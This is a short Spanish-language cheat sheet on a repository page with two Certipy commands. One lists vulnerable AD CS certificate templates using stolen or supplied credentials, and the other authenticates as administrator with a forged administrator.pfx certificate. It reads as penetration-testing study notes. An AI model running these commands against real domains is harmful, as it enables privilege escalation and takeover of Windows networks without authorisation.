Skip to content

Latest commit

 

History

History

certipy

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 

Certipy Cheat Sheet

Conocer el nivel y saber que template es vulnerable

certipy find -u <USER>@<DOMAIN> -p '<PASSWORD>' -dc-ip <IP-ADDRESS> -vulnerable -stdout

Autenticarse usando el TGT creado (administrator.pfx)

certipy auth -pfx 'administrator.pfx' -username '<USERNAME>' -domain '<DOMAIN>' -dc-ip <IP-ADDRESS>

⬅️ Regresar